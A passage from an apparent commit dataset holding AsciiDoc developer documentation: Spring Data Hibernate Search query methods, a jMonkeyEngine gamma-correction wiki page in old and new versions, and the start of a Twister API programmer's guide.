annotation's attributes are standard and defined in\nhttps:\/\/docs.spring.io\/spring-data\/jpa\/docs\/current\/reference\/html\/#repositories.namespace-reference[Spring Data Commons' documentation]\n\nIf no base package is configured, the one the configuration class resides in will be used.\n\nThe configuration is simpler when using Spring Boot's auto-configuration:\n\n.Hibernate Search standalone repositories using JavaConfig when using Spring Boot's auto-configuration\n====\n[source,java]\n----\n@Configuration\n@EnableAutoConfiguration\n@EnableHibernateSearchRepositories(basePackages = \"com\/example\/repositories\")\npublic class Config {\n}\n----\n====\n\nIf you do not want to or cannot use auto-configuration for some reason,\nyou will also need to declare additional beans:\nsee <<hibernatesearch.standalone.configuration.advanced>>.\n\n[[hibernatesearch.standalone.configuration.xml]]\n=== XML-based configuration\n\nWARNING: XML-based configuration is not implemented yet.\n\n[[hibernatesearch.standalone.configuration.cdi]]\n=== CDI configuration\n\nWARNING: CDI integration is not implemented yet.\n\n[[hibernatesearch.standalone.configuration.advanced]]\n=== Advanced configuration\n\nIf you don't want to use auto configuration for some reason,\nyou need to add a bean of type `me.snowdrop.data.hibernatesearch.spi.DatasourceMapper` to the context.\nThe Hibernate Search Spring Data module will look for such a bean named `datasourceMapper` by default,\nbut you can customize the bean name using `@EnableHibernateSearchRepositories.datasourceMapperRef`.\n\nWhen using Hibernate Search integrated to Hibernate ORM,\nyou can declare the bean as an instance of `me.snowdrop.data.hibernatesearch.orm.JpaDatasourceMapper`.\nIts constructor expects an `EntityManagerFactory`.\n\nWhen using Hibernate Search integrated to Infinispan Query,\nyou can declare the bean as an instance of `me.snowdrop.data.hibernatesearch.config.infinispan.InfinispanDatasourceMapper`.\nIts constructor expects a `me.snowdrop.data.hibernatesearch.config.infinispan.EntityToCacheMapper`.\n\n[[hibernatesearch.repository]]\n= Repository interfaces\n\n[[hibernatesearch.repository.extending]]\n== JPA repository extension\n\nThis section explains how to add Hibernate Search methods to a JPA repository.\nThis means that, whenever Spring Data implements these methods automatically\n(see <<hibernatesearch.query-methods.derived,derived queries>>, <<hibernatesearch.query-methods.at-query,declared queries>>),\nthey are implemented as Hibernate Search queries (i.e. methods targeting a full-text index)\ninstead of JPA queries.\n\n[NOTE]\n====\nThis feature is only available if you set up\nthe Hibernate Search \/ Spring Data integration to extend JPA repositories:\nsee <<hibernatesearch.jpaextension>>.\n====\n\nIn order to add a Hibernate Search extension to a JPA repository, you need to:\n\n* create an interface extending `me.snowdrop.data.hibernatesearch.repository.extension.RepositoryHibernateSearchExtension<T, ID>`\n* add to this interface the methods that are to be implemented as Hibernate Search queries\n* make the interface of your JPA repository extend this interface\n\n.Extending a JPA repository with Hibernate Search query methods\n====\n[source,java]\n----\npublic interface BookRepositoryHibernateSearchExtension extends RepositoryHibernateSearchExtension<Book, String>\n{\n List<Book> findByName(String name);\n}\n\npublic interface BookRepository extends JpaRepository<Book, String>, BookRepositoryHibernateSearchExtension\n{\n List<Book> findByPrice(Integer price);\n}\n\npublic class SomeComponent {\n\n @Autowired\n BookRepository bookRepository;\n\n public void doSomething() {\n \/\/ This executes a Hibernate Search query, i.e. a query on the full-text indexes, instead of a JPA query\n List<Book> books = bookRepository.findByName(\"robots dawn\");\n\n \/\/ ... do something with the book list ...\n }\n\n}\n----\n====\n\n[[hibernatesearch.repository.standalone]]\n== Standalone Hibernate Search repository\n\nTo declare repository interfaces, you can extend either the generic `org.springframework.data.repository.Repository<T, ID>` interface\n(if there is no ambiguity as to which Spring Data module should implement the repository)\nor the more specific `me.snowdrop.data.hibernatesearch.repository.HibernateSearchRepository<T, ID>`.\n\n[[hibernatesearch.query-methods]]\n= Query methods\n\n[[hibernatesearch.query-methods.finders]]\n== Query lookup strategies\n\nQueries can be <<hibernatesearch.query-methods.derived,derived from the method name>>,\nor be <<hibernatesearch.query-methods.at-query,defined as strings and assigned to a method>>.\n\nAs with any Spring Data module, you can also implement query methods yourself through\nhttps:\/\/docs.spring.io\/spring-data\/data-commons\/docs\/current\/reference\/html\/#repositories.custom-implementations[custom implementation fragments].\n\n[[hibernatesearch.query-methods.derived]]\n== Derived queries\n\nGenerally the query derivation mechanism for Hibernate Search works as described in\nhttps:\/\/docs.spring.io\/spring-data\/data-commons\/docs\/{springDataVersion}\/reference\/html\/#repositories.query-methods[the Spring Data Commons documentation].\n\nHere's a short example of what a Hibernate Search query method translates into:\n\n.Query creation from method names\n====\n[source,java]\n----\npublic interface BookRepository extends Repository<Book, String>\n{\n List<Book> findByNameAndPrice(String name, Integer price);\n} \n----\n====\n\nThe method name above will be translated into the following call to a Hibernate Search query builder:\n\n[source,java]\n----\nQuery query = queryBuilder.bool()\n .must(\n queryBuilder.keyword().onField(\"name\").matching(name).createQuery()\n )\n .must(\n queryBuilder.keyword().onField(\"price\").matching(price).createQuery()\n )\n .createQuery();\n----\n\nA list of supported keywords for Hibernate Search is shown below.\n\n[cols=\"1,2,3\", options=\"header\"]\n.Supported keywords inside method names\n|===\n| Keyword\n| Sample\n| Query builder equivalent\n\n| `Is`\n| `findByName`\n| `queryBuilder.keyword().onField(\"name\").matching(name).createQuery()`\n\n| `And`\n| `findByNameAndPrice`\na|\n[source,java]\n----\nqueryBuilder.bool()\n .must(\n queryBuilder.keyword().onField(\"name\").matching(name).createQuery()\n )\n .must(\n queryBuilder.keyword().onField(\"price\").matching(price).createQuery()\n )\n .createQuery();\n----\n\n| `Or`\n| `findByNameOrPrice`\na|\n[source,java]\n----\nqueryBuilder.bool()\n .should(\n queryBuilder.keyword().onField(\"name\").matching(name).createQuery()\n )\n .should(\n queryBuilder.keyword().onField(\"price\").matching(price).createQuery()\n )\n .createQuery();\n----\n\n| `Not`\n| `findByNameNot`\na|\n[source,java]\n----\nqueryBuilder.bool()\n .must(\n queryBuilder.keyword().onField(\"name\").matching(name).createQuery()\n )\n .not()\n .createQuery();\n----\n\n| `Between`\n| `findByPriceBetween`\n| `queryBuilder.range().onField(\"price\").from(lower).to(upper).createQuery()`\n\n| `LessThan`\n| `findByPriceLessThan`\n| `queryBuilder.range().onField(\"price\").below(upper).excludeLimit().createQuery()`\n\n| `LessThanEqual`\n| `findByPriceLessThanEqual`\n| `queryBuilder.range().onField(\"price\").below(upper).createQuery()`\n\n| `GreaterThan`\n| `findByPriceGreaterThan`\n| `queryBuilder.range().onField(\"price\").above(lower).excludeLimit().createQuery()`\n\n| `GreaterThanEqual`\n| `findByPriceGreaterThanEqual`\n| `queryBuilder.range().onField(\"price\").above(lower).createQuery()`\n\n| `Before`\n| `findByPriceBefore`\n| `queryBuilder.range().onField(\"price\").below(upper).excludeLimit().createQuery()`\n\n| `After`\n| `findByPriceAfter`\n| `queryBuilder.range().onField(\"price\").above(lower).excludeLimit().createQuery()`\n\n| `Like`\n| `findByNameLike`\n| `queryBuilder.keyword().wildcard().onField(\"name\").matching(name + \"*\")`\n\n| `StartingWith`\n| `findByNameStartingWith`\n| `queryBuilder.keyword().wildcard().onField(\"name\").matching(name + \"*\")`\n\n| `EndingWith`\n| `findByNameEndingWith`\n| `queryBuilder.keyword().wildcard().onField(\"name\").matching(\"*\" + name)`\n\n| `Contains\/Containing`\n| `findByNameContaining`\n| `queryBuilder.keyword().wildcard().onField(\"name\").matching(\"*\" + name + \"*\")`\n\n| `In`\n| `findByNameIn(Collection<String>names)`\na|\n[source,java]\n----\nqueryBuilder.bool()\n .should(\n queryBuilder.keyword().onField(\"name\").matching(<first element>).createQuery()\n )\n .should(\n queryBuilder.keyword().onField(\"name\").matching(<second element>).createQuery()\n )\n \/\/ ...\n .should(\n queryBuilder.keyword().onField(\"name\").matching(<last element>).createQuery()\n )\n .createQuery();\n----\n\n| `NotIn`\n| `findByNameNotIn(Collection<String>names)`\na|\n[source,java]\n----\nqueryBuilder.bool()\n .must(\n queryBuilder.keyword().onField(\"name\").matching(<first element>).createQuery()\n )\n .not()\n .must(\n queryBuilder.keyword().onField(\"name\").matching(<second element>).createQuery()\n )\n .not()\n \/\/ ...\n .must(\n queryBuilder.keyword().onField(\"name\").matching(<last element>).createQuery()\n )\n .not()\n .createQuery();\n----\n\n| `Near`\n| `findByStoreNear`\n| `Not Supported Yet !`\n\n| `True`\n| `findByAvailableTrue`\n| `queryBuilder.keyword().wildcard().onField(\"available\").matching(true)`\n\n| `False`\n| `findByAvailableFalse`\n| `queryBuilder.keyword().wildcard().onField(\"available\").matching(false)`\n\n| `MatchesRegex`\/`Regex`\/`Matches`\n| `findByNameMatchesRegex`\n| `new RegexpQuery(new Term(\"name\", reqexp)`\n\n| `Within`\n| `findByLocationWithin`\n| `queryBuilder.spatial().onField(\"location\").within(distance, Unit.KM).ofLatitude(latitude).andLongitude(longitude).createQuery()`\n\n| `OrderBy`\n| `findByAvailableTrueOrderByNameDesc`\n| `queryBuilder.keyword().wildcard().onField(\"available\").matching(true)` and\n`queryBuilder.sort().byField(\"name\").desc().createSort()`\n|===\n\n[[hibernatesearch.query-methods.fieldnames]]\n=== Targeting specific fields\n\nBy default, derived queries target the default field,\nthe one named after the entity property mentioned in the query method name.\nThat is to say, if your method refers to the property \"name\", the query will target the index field \"name\",\nand will expect that index field to exist.\n\nWhat if you want to target the field \"name_sort\"?\nYou can use the `@me.snowdrop.data.hibernatesearch.annotations.TargetField` annotation.\n\n.Target non-default fields using the `@TargetField` annotation.\n====\n[source,java]\n----\npublic interface BookRepository extends HibernateSearchRepository<Book, String> {\n @TargetField(property = \"name\", field = \"name_sort\")\n Page<Book> findByAvailableTrueOrderByNameAsc(String name, Pageable pageable);\n}\n----\n====\n\n[[hibernatesearch.query-methods.at-query]]\n== Using @Query Annotation\n\nQueries can be defined as strings using the `me.snowdrop.data.hibernatesearch.annotations.Query` annotation.\nSuch strings are expected to use the Lucene Query syntax.\n\nThey can be named and defined in a resource file,\nthe location of which is defined when <<hibernatesearch.jpaextension.configuration,configuring>> the Hibernate Search module.\nThen the queries will be assigned to a query method using `@Query(name = \"<the query name>\")`.\n\nAlternatively, the queries can be assigned to the method directly using `@Query(\"<the query>\")`.\n\n.Declare query at the method using the `@Query` annotation.\n====\n[source,java]\n----\npublic interface BookRepository extends HibernateSearchRepository<Book, String> {\n @Query(\"+name:?0\")\n Page<Book> findByName(String name, Pageable pageable);\n} \n----\n====\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7045744fb8202002db4f98a607289cf4bb48e369","subject":"remove links","message":"remove links\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"docs\/modules\/ROOT\/pages\/jme3\/advanced\/jme3_srgbpipeline.adoc","new_file":"docs\/modules\/ROOT\/pages\/jme3\/advanced\/jme3_srgbpipeline.adoc","new_contents":"= Gamma Correction or sRGB pipeline\n:author:\n:revnumber:\n:revdate: 2016\/03\/17 20:48\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\n\n== Overview\n\nWe consider color values to be linear when computing lighting. What does that means? That means that we assume that the color 0.5,0.5,0.5 is half way between black and white. +\nThe problem is that it\u2019s not the case, or at least not when you look at the color through a monitor. +\nCRT monitors had physical limitations that prevented them to have a linear way of representing colors. that means that 0.5,0.5,0.5 through a monitor is not half way between black and white (it\u2019s darker). Note that black and white remains the same though. +\nIf we do not take that into account, the rendered images are overly darken and feels dull. +\nLCD monitors still mimic this physical limitation (I guess for backward compatibility). +\n*Output correct colors* +\nGamma Correction is the technique that tends to correct the issue. Gamma is an power factor applied to the color by the monitor when lighting a pixel on screen (or at least a simplification of the function applied). So when we output the color, we have to apply the inverse power of this factor to nullify the effect : finalColor = pow(computedColor, 1\/gamma); +\n\n*Knowing what colors we have as input* +\nThe other aspect of gamma correction is the colors we get as input in the rendering process that are stored in textures or in ColorRGBA material params. Almost all image editors are storing color data in images already gamma corrected (so that colors are correct when you display the picture in a viewer of in a browser). Also most hand picked colors (in a color picker) can be assumed as gamma corrected as you most probably chose this color through a monitor display.\nSuch images or color are said to be in sRGB color space, meaning \u201cstandard RGB\u201d (which is not the standard one would guess).\nThat means that textures and colors that we use as input in our shaders are not in a linear space. The issue is that we need them in linear space when we compute the lighting, else the lighting is wrong.\nTo avoid this we need to apply some gamma correction to the colors : (pow(color, gamma);\nThis only apply to textures that will render colors on screen (basically diffuse map, specular, light maps). Normal maps, height maps don\u2019t need the correction.\n\nThis is the kind of difference you can have : +\nleft is non corrected output, right is gamma corrected output. +\nimage:http:\/\/i.imgur.com\/uNL7vw8.png[uNL7vw8.png,width=\"\",height=\"\"]\n\n\n\n=== Implementation\n\n* To handle proper gamma corrected ouput colors, Opengl expose an ARB extension that allows you to output a color in linear space and have the GPU automatically correct it : link:https:\/\/www.opengl.org\/registry\/specs\/ARB\/framebuffer_sRGB.txt[https:\/\/www.opengl.org\/registry\/specs\/ARB\/framebuffer_sRGB.txt]\n* To handle the input, instead of classic RGBA8 image format, one can use SRGB8_ALPHA8_EXT which is basically RGBA in sRGB. Using this you specify the GPU that the texture is in sRGB space and when fetching a color from it, the GPU will linearize the color value for you (for free). There are sRGB equivalent to all 8 bits formats (even compressed format like DXT).\n* But all textures don't need this. For example, normal maps, height maps colors are most probably generated and not hand picked by an artist looking through a monitor. The implementation needs to account for it and expose a way to exclude some textures from the sRGB pipeline.\n\nGamma Correction in jME 3.0 is based on those three statements.\n\n[IMPORTANT]\n====\nNote that Gamma Correction is only available on desktop with LWJGL or JOGL renderer. They are not yet supported on Android or iOS renderers.\n====\n\n\n\n==== Turning Gamma Correction on\/off\n\nYou can turn Gamma Correction on and off using the AppSettings. There is a method setGammaCorrection(boolean) that changes the setting.\nuse this in the main() method of your application :\n\n[source,java]\n----\n\nAppSettings settings = new AppSettings(true);\nsettings.setGammaCorrection(true);\napp.setSettings(settings);\n\n----\n\nThis setting is also exposed in the Settings dialog displayed when you launch a jME application. +\nimage:http:\/\/i.imgur.com\/Lya1ldH.png[Lya1ldH.png,width=\"400\",height=\"\"]\n\n\n[IMPORTANT]\n====\nThis is a short hand to enable both linearization of input textures and Gamma correction of the rendered output on screen. +\n*Both can be enabled separately*.\n\n====\n\n\n\n===== Enabling output Gamma Correction\n\nYou can enable or disable the Gamma correction of the rendered output by using:\n\n[source,java]\n----\nrenderer.setMainFrameBufferSrgb(boolean srgb)\n----\n\nThis will be ignored if the hardware doesn't have the GL_ARB_framebuffer_sRGB or the GL_EXT_texture_sRGB.\nThis can be toggled at run time.\n\nThis uses Opengl hardware gamma correction that uses an approximated Gamma value of 2.2 and uses the following formula : color = pow(color,1\/gamma)\n\n[NOTE]\n====\nThis will not yield exact results, as the real gamma can vary depending on the monitor. +\nIf this is a problem, please refer to the \u201chandling gamma correction in a post process section.\n====\n\n\n===== Enabling texture linearization\n\nYou can enable or disable texture linearization by using\n\n[source,java]\n----\nrenderer.setLinearizeSrgbImages(boolean linearize)\n----\n\nThis will be ignored if the hardware doesn't have the GL_ARB_framebuffer_sRGB or the GL_EXT_texture_sRGB.\n\n[IMPORTANT]\n====\nToggling this setting at runtime will produce unexpected behavior for now. A change in this setting would need a proper reload of the context to work.\n====\n\n\nAll images marked as in sRGB color space will be uploaded to the GPU using a sRGB image format.\nOpengl hardware texture linearization also uses an approximated Gamma value of 2.2 and linearize the fetched texel color using the following formula : color = pow(color, gamma) +\nAs with output gamma correction this will not give exact result, but the error is less important since most image editor uses the same approximation to correct images and save them in sRGB color space.\n\nNot all image format have their sRGB equivalent, and only 8bit formats.\nHere is an exhaustive list of the supported format and there equivalent :\n\n* RGB8 : GL_SRGB8\n* RGBA8 : GL_SRGB8_ALPHA8\n* BGR8 : GL_SRGB8\n* ABGR8 : GL_SRGB8_ALPHA8\n* Luminance8 : GL_SLUMINANCE8\n* Luminance8Alpha8 : GL_SLUMINANCE8_ALPHA8\n* DXT1 : GL_COMPRESSED_SRGB_S3TC_DXT1\n* DXT1A : GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT1\n* DXT3 : GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT3\n* DXT5 : GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT5\n\n\n[IMPORTANT]\n====\nConventionally only the rgb channels are gamma corrected, as the alpha channel does not a represent a color value\n====\n\n\n\n==== Excluding images from the sRGB pipeline\n\n\n[IMPORTANT]\n====\nOnly loaded images will be marked as in sRGB color space, when using assetManager.loadTexture or loadAsset. +\nThe color space of an image created by code will have to be specified in the constructor or will be assumed as Linear if not specified.\n====\n\n\nNot all images need to be linearized. Some images don't represent color information that will be displayed on screen, but more different sort of data packed in a texture. +\nThe best example is a Normal map that will contains normal vectors for each pixel. Height maps will contain elevation values. These textures must not be linearized.\n\nThere is no way to determine the real color space of an image when loading it, so we must deduce the color space from the usage it's loaded for. The usage is dictated by the material, those textures are used for, and by the material parameter they are assigned to.\nOne can now specify in a material definition file (j3md) if a texture parameter must be assumed as in linear color space, and thus, must not be linearized, by using the keyword -LINEAR next to the parameter (case does not matter).\n\nFor example here is how the NormalMap parameter is declared in the lighting material definition.\n\n[source]\n----\n\n \/\/ Normal map\n Texture2D NormalMap -LINEAR\n\n----\n\nWhen a texture is assigned to this material param by using material.setTexture(\u201cNormalMap, myNormalTexture), the color space of this texture's image will be forced to linear. So if you make your own material and want to use Gamma Correction, make sure you properly mark your textures as in the proper color space.\n\nThis can sound complicated, but you just have to answer this question : Does my image represent color data? if the answer is no, then you have to set the -Linear flag.\n\n\n==== ColorRGBA as sRGB\n\n\n[IMPORTANT]\n====\nThe r, g, b attributes of a ColorRGBA object are *ALWAYS* assumed in Linear color space.\n\n====\n\n\nIf you want to set a color that you hand picked in a color picker, you should use the setAsSRGB method of ColorRGBA. This will convert the given values to linear color space by using the same formula as before : color = pow (color, gamma) where gamma = 2.2;\n\nIf you want to retrieve those values from a ColorRGBA, you can call the getAsSRGB method. The values will be converted back to sRGB color Space.\n\n[NOTE]\n====\nThe return type of that method is a Vector4f and not a ColorRGBA, because as stated before, all ColorRGBA objects r,g,b attributes are assumed in Linear color space.\n====\n\n\n==== Handling rendered output Gamma Correction with a post process filter\n\nAs stated before, the hardware gamma correction uses and approximated gamma value of 2.2.\nSome may not be satisfied with that approximations and may want to pick a more appropriate gamma value.\nYou can see in some games some Gamma calibration screens, that are here to help the player pick a correct gamma value for the monitor he's using.\n\nFor this particular case, you can do as follow :\n\n. Enable Gamma Correction global app setting.\n. Disable rendered output correction : renderer.setMainFrameBufferSrgb(false); (for example in the simpleInit method of your SimpleApplication).\n. Use the GammaCorrectionFilter in a FilterPostProcessor, and set the proper gamma value on it (default is 2.2).\n\n\n=== Should you use this?\n\nYes. Mostly because it's the only way to have proper lighting.\nIf you're starting a new project it's a no brainer\u2026use it, period. And don't allow the player to turn it off.\n\nNow if you already spent time to adjust lighting in your scenes, without gamma correction, turning it on will make everything too bright, and you'll have to adjust all your lighting and colors again.\nThat's why we kept a way to turn it off, for backward compatibility.\n","old_contents":"= Gamma Correction or sRGB pipeline\n:author:\n:revnumber:\n:revdate: 2016\/03\/17 20:48\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\n\n== Overview\n\nHere is a quick overview of what lies under the \u201cGamma Correction term. +\nMore in depth rundowns on the matter can be found here : link:http:\/\/http.developer.nvidia.com\/GPUGems3\/gpugems3_ch24.html[http:\/\/http.developer.nvidia.com\/GPUGems3\/gpugems3_ch24.html] and here link:http:\/\/www.arcsynthesis.org\/gltut\/Texturing\/Tutorial%2016.html[http:\/\/www.arcsynthesis.org\/gltut\/Texturing\/Tutorial%2016.html]\n\nWe consider color values to be linear when computing lighting. What does that means? That means that we assume that the color 0.5,0.5,0.5 is half way between black and white. +\nThe problem is that it\u2019s not the case, or at least not when you look at the color through a monitor. +\nCRT monitors had physical limitations that prevented them to have a linear way of representing colors. that means that 0.5,0.5,0.5 through a monitor is not half way between black and white (it\u2019s darker). Note that black and white remains the same though. +\nIf we do not take that into account, the rendered images are overly darken and feels dull. +\nLCD monitors still mimic this physical limitation (I guess for backward compatibility). +\n*Output correct colors* +\nGamma Correction is the technique that tends to correct the issue. Gamma is an power factor applied to the color by the monitor when lighting a pixel on screen (or at least a simplification of the function applied). So when we output the color, we have to apply the inverse power of this factor to nullify the effect : finalColor = pow(computedColor, 1\/gamma); +\n\n*Knowing what colors we have as input* +\nThe other aspect of gamma correction is the colors we get as input in the rendering process that are stored in textures or in ColorRGBA material params. Almost all image editors are storing color data in images already gamma corrected (so that colors are correct when you display the picture in a viewer of in a browser). Also most hand picked colors (in a color picker) can be assumed as gamma corrected as you most probably chose this color through a monitor display.\nSuch images or color are said to be in sRGB color space, meaning \u201cstandard RGB\u201d (which is not the standard one would guess).\nThat means that textures and colors that we use as input in our shaders are not in a linear space. The issue is that we need them in linear space when we compute the lighting, else the lighting is wrong.\nTo avoid this we need to apply some gamma correction to the colors : (pow(color, gamma);\nThis only apply to textures that will render colors on screen (basically diffuse map, specular, light maps). Normal maps, height maps don\u2019t need the correction.\n\nThis is the kind of difference you can have : +\nleft is non corrected output, right is gamma corrected output. +\nimage:http:\/\/i.imgur.com\/uNL7vw8.png[uNL7vw8.png,width=\"\",height=\"\"]\n\n\n\n=== Implementation\n\n* To handle proper gamma corrected ouput colors, Opengl expose an ARB extension that allows you to output a color in linear space and have the GPU automatically correct it : link:https:\/\/www.opengl.org\/registry\/specs\/ARB\/framebuffer_sRGB.txt[https:\/\/www.opengl.org\/registry\/specs\/ARB\/framebuffer_sRGB.txt]\n* To handle the input, instead of classic RGBA8 image format, one can use SRGB8_ALPHA8_EXT which is basically RGBA in sRGB. Using this you specify the GPU that the texture is in sRGB space and when fetching a color from it, the GPU will linearize the color value for you (for free). There are sRGB equivalent to all 8 bits formats (even compressed format like DXT).\n* But all textures don't need this. For example, normal maps, height maps colors are most probably generated and not hand picked by an artist looking through a monitor. The implementation needs to account for it and expose a way to exclude some textures from the sRGB pipeline.\n\nGamma Correction in jME 3.0 is based on those three statements.\n\n[IMPORTANT]\n====\nNote that Gamma Correction is only available on desktop with LWJGL or JOGL renderer. They are not yet supported on Android or iOS renderers.\n====\n\n\n\n==== Turning Gamma Correction on\/off\n\nYou can turn Gamma Correction on and off using the AppSettings. There is a method setGammaCorrection(boolean) that changes the setting.\nuse this in the main() method of your application :\n\n[source,java]\n----\n\nAppSettings settings = new AppSettings(true);\nsettings.setGammaCorrection(true);\napp.setSettings(settings);\n\n----\n\nThis setting is also exposed in the Settings dialog displayed when you launch a jME application. +\nimage:http:\/\/i.imgur.com\/Lya1ldH.png[Lya1ldH.png,width=\"400\",height=\"\"]\n\n\n[IMPORTANT]\n====\nThis is a short hand to enable both linearization of input textures and Gamma correction of the rendered output on screen. +\n*Both can be enabled separately*.\n\n====\n\n\n\n===== Enabling output Gamma Correction\n\nYou can enable or disable the Gamma correction of the rendered output by using:\n\n[source,java]\n----\nrenderer.setMainFrameBufferSrgb(boolean srgb)\n----\n\nThis will be ignored if the hardware doesn't have the GL_ARB_framebuffer_sRGB or the GL_EXT_texture_sRGB.\nThis can be toggled at run time.\n\nThis uses Opengl hardware gamma correction that uses an approximated Gamma value of 2.2 and uses the following formula : color = pow(color,1\/gamma) \n\n[NOTE]\n====\nThis will not yield exact results, as the real gamma can vary depending on the monitor. +\nIf this is a problem, please refer to the \u201chandling gamma correction in a post process section.\n====\n\n\n===== Enabling texture linearization\n\nYou can enable or disable texture linearization by using\n\n[source,java]\n----\nrenderer.setLinearizeSrgbImages(boolean linearize)\n----\n\nThis will be ignored if the hardware doesn't have the GL_ARB_framebuffer_sRGB or the GL_EXT_texture_sRGB.\n\n[IMPORTANT]\n====\nToggling this setting at runtime will produce unexpected behavior for now. A change in this setting would need a proper reload of the context to work.\n====\n\n\nAll images marked as in sRGB color space will be uploaded to the GPU using a sRGB image format.\nOpengl hardware texture linearization also uses an approximated Gamma value of 2.2 and linearize the fetched texel color using the following formula : color = pow(color, gamma) +\nAs with output gamma correction this will not give exact result, but the error is less important since most image editor uses the same approximation to correct images and save them in sRGB color space.\n\nNot all image format have their sRGB equivalent, and only 8bit formats.\nHere is an exhaustive list of the supported format and there equivalent :\n\n* RGB8 : GL_SRGB8\n* RGBA8 : GL_SRGB8_ALPHA8\n* BGR8 : GL_SRGB8\n* ABGR8 : GL_SRGB8_ALPHA8\n* Luminance8 : GL_SLUMINANCE8\n* Luminance8Alpha8 : GL_SLUMINANCE8_ALPHA8\n* DXT1 : GL_COMPRESSED_SRGB_S3TC_DXT1\n* DXT1A : GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT1\n* DXT3 : GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT3\n* DXT5 : GL_COMPRESSED_SRGB_ALPHA_S3TC_DXT5\n\n\n[IMPORTANT]\n====\nConventionally only the rgb channels are gamma corrected, as the alpha channel does not a represent a color value\n====\n\n\n\n==== Excluding images from the sRGB pipeline\n\n\n[IMPORTANT]\n====\nOnly loaded images will be marked as in sRGB color space, when using assetManager.loadTexture or loadAsset. +\nThe color space of an image created by code will have to be specified in the constructor or will be assumed as Linear if not specified.\n====\n\n\nNot all images need to be linearized. Some images don't represent color information that will be displayed on screen, but more different sort of data packed in a texture. +\nThe best example is a Normal map that will contains normal vectors for each pixel. Height maps will contain elevation values. These textures must not be linearized.\n\nThere is no way to determine the real color space of an image when loading it, so we must deduce the color space from the usage it's loaded for. The usage is dictated by the material, those textures are used for, and by the material parameter they are assigned to.\nOne can now specify in a material definition file (j3md) if a texture parameter must be assumed as in linear color space, and thus, must not be linearized, by using the keyword -LINEAR next to the parameter (case does not matter).\n\nFor example here is how the NormalMap parameter is declared in the lighting material definition.\n\n[source]\n----\n\n \/\/ Normal map\n Texture2D NormalMap -LINEAR\n\n----\n\nWhen a texture is assigned to this material param by using material.setTexture(\u201cNormalMap, myNormalTexture), the color space of this texture's image will be forced to linear. So if you make your own material and want to use Gamma Correction, make sure you properly mark your textures as in the proper color space.\n\nThis can sound complicated, but you just have to answer this question : Does my image represent color data? if the answer is no, then you have to set the -Linear flag.\n\n\n==== ColorRGBA as sRGB\n\n\n[IMPORTANT]\n====\nThe r, g, b attributes of a ColorRGBA object are *ALWAYS* assumed in Linear color space.\n\n====\n\n\nIf you want to set a color that you hand picked in a color picker, you should use the setAsSRGB method of ColorRGBA. This will convert the given values to linear color space by using the same formula as before : color = pow (color, gamma) where gamma = 2.2;\n\nIf you want to retrieve those values from a ColorRGBA, you can call the getAsSRGB method. The values will be converted back to sRGB color Space.\n\n[NOTE]\n====\nThe return type of that method is a Vector4f and not a ColorRGBA, because as stated before, all ColorRGBA objects r,g,b attributes are assumed in Linear color space.\n====\n\n\n==== Handling rendered output Gamma Correction with a post process filter\n\nAs stated before, the hardware gamma correction uses and approximated gamma value of 2.2.\nSome may not be satisfied with that approximations and may want to pick a more appropriate gamma value.\nYou can see in some games some Gamma calibration screens, that are here to help the player pick a correct gamma value for the monitor he's using.\n\nFor this particular case, you can do as follow :\n\n. Enable Gamma Correction global app setting.\n. Disable rendered output correction : renderer.setMainFrameBufferSrgb(false); (for example in the simpleInit method of your SimpleApplication).\n. Use the GammaCorrectionFilter in a FilterPostProcessor, and set the proper gamma value on it (default is 2.2).\n\n\n=== Should you use this?\n\nYes. Mostly because it's the only way to have proper lighting.\nIf you're starting a new project it's a no brainer\u2026use it, period. And don't allow the player to turn it off.\n\nNow if you already spent time to adjust lighting in your scenes, without gamma correction, turning it on will make everything too bright, and you'll have to adjust all your lighting and colors again.\nThat's why we kept a way to turn it off, for backward compatibility.\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"2bada7423cb9da398c6bab23fdfa915be56ff72d","subject":"Added document in the repo","message":"Added document in the repo\n","repos":"twister2016\/twister,twister2016\/twister,twister2016\/twister,twister2016\/twister","old_file":"documentation\/manual\/TwisterApplicationProgrammersGuide.adoc","new_file":"documentation\/manual\/TwisterApplicationProgrammersGuide.adoc","new_contents":"= TWISTER APPLICATION PROGRAMMERS GUIDE\r\n:docinfo:\r\n[preface]\r\n== Introduction\r\nThis document gives an overview of the modules build in Twister API and how an application is built on it. The detailed definitions and individual function calls can be found in the doc folder of Twister API. \r\nAt start, the document explains the core modules of twister API, these include initialization module, event loop, ARP table management and JSON parsing. Details of build system are also included.\r\nAfter that, it explains the sample application step by step to give programmer an example of API usage. The Appendices contain information to debug any relevant issues. \r\nThe best way to start is to go through the Sample Applications Details Section initially while reviewing the code of the sample application and then go through the whole document for complete understanding of design of Twister API and application development on top of it. \r\n\r\n\r\n\r\n== Initialization Module\r\nThe initialization module of API handles the initialization of twister abstraction layer. Abstraction layer consists of the following parts:\r\n* System Memory Reservation: The abstraction layer facilitates the reservation of different memory zones, for example, physical memory areas for device interactions.\r\n* Allocate PCI resources and set up the physical device and the link\r\n* Initialize statistics counters\r\n* Link Up\/Down control and notification interrupt. This is the only interrupt that a PMD handles\r\n* Port and Queue setup for both RX and TX\r\n* Access the RX and TX descriptors directly without any interrupts\r\n* Assign user specified parameters to the physical device.\r\nIn the Twister API, all the above initialization steps are formed by single API call which is:\r\ntw_init_global(argc, argv)\r\nThe user specified parameters for the physical device are provided in the port_conf file. This file must be present in the application directory. The parameters are further explained in the below section:\r\n\r\n=== Port Management \r\nThe port management is assigning specific parameters which include IP address, subnet mask, gateway IP to the port. All this is done in the initialization module. The user just hast to provide a file to the module, which is port_conf. The configuration file should be in JSON format and a sample is provided below:\r\n\r\nport_conf file is array of JSON fields. Each array [port_name: <>, ip_addrs:<>] corresponds to one port:\r\n* port_name: This is an identifier that lists the port name. The port name is assigned by Twister Virtual Machine (TVM)OS. TVM assigns the port name as 